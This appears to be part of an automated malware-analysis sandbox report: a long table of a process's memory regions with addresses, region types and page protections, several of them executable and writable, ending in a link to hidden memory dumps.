194000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
2330000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
342000
|
heap private
|
page read and write
|
||
278D000
|
unkown
|
page read and write
|
||
296A000
|
heap private
|
page execute and read and write
|
||
270000
|
unkown
|
page readonly
|
||
480000
|
heap private
|
page read and write
|
||
265E000
|
unkown
|
page read and write
|
||
376000
|
unkown
|
page read and write
|
||
767000
|
heap default
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
2C8E000
|
unkown
|
page read and write
|
||
5E0000
|
heap default
|
page read and write
|
||
AE0000
|
heap private
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
5A4000
|
heap default
|
page read and write
|
||
25C0000
|
unkown
|
page read and write
|
||
627000
|
heap default
|
page read and write
|
||
2960000
|
heap private
|
page execute and read and write
|
||
1C0000
|
heap private
|
page read and write
|
||
210000
|
unkown
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
69D000
|
heap default
|
page read and write
|
||
7FF000D0000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page execute and read and write
|
||
2D4000
|
heap private
|
page read and write
|
||
47D000
|
stack
|
page read and write
|
||
554000
|
heap default
|
page read and write
|
||
62D000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
330000
|
unkown
|
page readonly
|
||
66C000
|
unkown
|
page read and write
|
||
574000
|
heap default
|
page read and write
|
||
26C000
|
stack
|
page read and write
|
||
27C2000
|
heap private
|
page read and write
|
||
1D77000
|
unkown
|
page readonly
|
||
530000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
5E7000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
2C4C000
|
unkown
|
page read and write
|
||
2B1000
|
unkown
|
page execute and read and write
|
||
30F8000
|
unkown
|
page read and write
|
||
590000
|
heap default
|
page read and write
|
||
1CB10000
|
heap private
|
page read and write
|
||
3E0000
|
heap default
|
page read and write
|
||
5F7000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
266E000
|
stack
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
65B000
|
heap default
|
page read and write
|
||
640000
|
heap default
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
70D000
|
heap default
|
page read and write
|
||
7FF00200000
|
unkown
|
page execute and read and write
|
||
37C000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2C7E000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
C8C000
|
unkown
|
page read and write
|
||
25C0000
|
unkown
|
page write copy
|
||
100000
|
unkown
|
page execute and read and write
|
||
840000
|
unkown
|
page readonly
|
||
2AEC000
|
unkown
|
page read and write
|
||
2010000
|
heap private
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
7FF0024A000
|
unkown
|
page execute and read and write
|
||
355F000
|
unkown
|
page read and write
|
||
2B5E000
|
unkown
|
page read and write | page guard
|
||
1D0000
|
unkown
|
page readonly
|
||
255D000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
ABE000
|
unkown
|
page read and write
|
||
66D000
|
heap default
|
page read and write
|
||
2D4E000
|
stack
|
page read and write
|
||
6B1000
|
unkown
|
page execute and read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
2BFC000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
2137000
|
unkown
|
page readonly
|
||
A70000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page readonly
|
||
590000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
707000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
850000
|
unkown
|
page readonly
|
||
948000
|
heap private
|
page read and write
|
||
5FF000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
273E000
|
stack
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
2620000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2620000
|
unkown
|
page read and write
|
||
3A8E000
|
unkown
|
page read and write
|
||
2C0000
|
unkown
|
page readonly
|
||
587000
|
heap default
|
page read and write
|
||
577000
|
heap default
|
page read and write
|
||
2C00000
|
unkown
|
page readonly
|
||
1B4E0000
|
unkown
|
page read and write
|
||
1B96000
|
unkown
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
2E0000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
B2E000
|
unkown
|
page read and write
|
||
2B94000
|
heap private
|
page read and write
|
||
2E2E000
|
stack
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
2620000
|
unkown
|
page read and write
|
||
A3F000
|
stack
|
page read and write
|
||
740000
|
unkown
|
page readonly
|
||
29A0000
|
heap private
|
page execute and read and write
|
||
388000
|
heap private
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
33F000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
250000
|
heap private
|
page read and write
|
||
270000
|
heap default
|
page read and write
|
||
3A6000
|
unkown
|
page read and write
|
||
2BD6000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1F50000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
CEE000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
1B4E8000
|
unkown
|
page read and write
|
||
4CD000
|
heap default
|
page read and write
|
||
5B8000
|
heap default
|
page read and write
|
||
760000
|
unkown
|
page readonly
|
||
34B8000
|
unkown
|
page read and write
|
||
470000
|
heap private
|
page read and write
|
||
6F4000
|
heap default
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
90000
|
unkown
|
page readonly
|
||
A50000
|
unkown
|
page write copy
|
||
2E0E000
|
stack
|
page read and write
|
||
3A0000
|
heap default
|
page read and write
|
||
1B390000
|
unkown
|
page read and write
|
||
570000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
120000
|
heap private
|
page read and write
|
||
2500000
|
heap private
|
page read and write
|
||
2B9E000
|
unkown
|
page read and write
|
||
26E0000
|
unkown
|
page write copy
|
||
220000
|
heap private
|
page read and write
|
||
3427000
|
unkown
|
page read and write
|
||
240000
|
heap private
|
page read and write
|
||
AEE000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
244000
|
heap private
|
page read and write
|
||
6B0000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
364000
|
heap private
|
page read and write
|
||
1B380000
|
unkown
|
page read and write
|
||
1CB23000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1CE0000
|
unkown
|
page readonly
|
||
66B000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page readonly
|
||
2CEF000
|
unkown
|
page read and write
|
||
32D000
|
heap default
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
53B000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2C0F000
|
stack
|
page read and write
|
There are 855 hidden memdumps, click here to show them.